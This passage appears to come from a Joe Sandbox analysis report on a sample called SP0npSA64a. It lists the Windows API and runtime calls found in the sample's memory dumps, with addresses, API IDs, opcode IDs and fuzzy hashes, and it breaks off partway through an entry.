                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                  • _wcstok.LIBCMT ref: 00443931
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 3632110297-0
                                                                                  • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                  • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                  • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                  • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                  • String ID:
                                                                                  • API String ID: 752480666-0
                                                                                  • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                  • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                  • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                  • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                  • String ID:
                                                                                  • API String ID: 3275902921-0
                                                                                  • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                  • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                  • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                  • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                  • String ID:
                                                                                  • API String ID: 3275902921-0
                                                                                  • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                  • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                  • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                  • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                  • String ID:
                                                                                  • API String ID: 2833360925-0
                                                                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                  APIs
                                                                                  • SendMessageW.USER32 ref: 004555C7
                                                                                  • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3691411573-0
                                                                                  • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                                  • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                                                                                  • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                                  • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                                                                                  APIs
                                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                  • EndPath.GDI32(?), ref: 004472D6
                                                                                  • StrokePath.GDI32(?), ref: 004472E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                  • String ID:
                                                                                  • API String ID: 372113273-0
                                                                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$Release
                                                                                  • String ID:
                                                                                  • API String ID: 1035833867-0
                                                                                  • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                  • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                  • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                  • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0041708E
                                                                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                  • __amsg_exit.LIBCMT ref: 004170AE
                                                                                  • __lock.LIBCMT ref: 004170BE
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                  • _free.LIBCMT ref: 004170EE
                                                                                  • InterlockedIncrement.KERNEL32(03072D00), ref: 00417106
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                  • String ID:
                                                                                  • API String ID: 3470314060-0
                                                                                  • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                  • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                  • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                  • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 3495660284-0
                                                                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                  APIs
                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual
                                                                                  • String ID:
                                                                                  • API String ID: 4278518827-0
                                                                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                  • ExitThread.KERNEL32 ref: 004151ED
                                                                                  • __freefls@4.LIBCMT ref: 00415209
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                  • String ID:
                                                                                  • API String ID: 442100245-0
                                                                                  • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                  • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                  • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                  • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                  APIs
                                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                  • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                  • _wcslen.LIBCMT ref: 0045F94A
                                                                                  • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                  • String ID: 0
                                                                                  • API String ID: 621800784-4108050209
                                                                                  • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                  • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                  • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                  • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                  APIs
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                  • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                  • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
